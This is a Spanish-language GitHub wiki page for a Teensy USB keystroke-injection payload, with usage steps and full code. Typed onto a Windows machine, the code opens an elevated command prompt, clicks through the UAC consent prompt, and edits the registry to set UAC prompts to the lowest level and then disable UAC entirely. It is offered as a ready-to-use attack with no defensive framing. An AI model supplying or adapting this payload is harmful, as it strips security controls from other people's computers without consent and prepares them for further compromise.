Payload Desactivar UAC - H3LL0WORLD/Teensy-Plantilla-Base GitHub Wiki

##¿Que hace?

1. Cambia la configuración de control de cuentas de usuarios al nivel más bajo, permitiéndonos ejecutar aplicaciones como administrador sin confirmación.
2. Desactiva el UAC (Necesita reiniciarse)

##Créditos:

• Plantilla Base: H3LL0WORLD
• Payload(s): H3LL0WORLD

##Uso

1. Poner el código en la función payload al final de la plantilla base.

// Delay promedio en milisegundos
int ds = 750;

// Abrir cmd como Admin
GUI(R);
delay(ds);
Escribir("powershell Start-Process cmd -Verb runAs");
delay(ds*2);
Izq();
Enter();
delay(ds*3);

// Modificar registro para cambiar la configuración de control de cuentas de usuarios al nivel mas bajo.
Escribir("reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f");
Escribir("reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f");

// Desactivar UAC (No surge efecto hasta despues de un reinicio)
Escribir("reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f");

// Salir
Escribir("exit");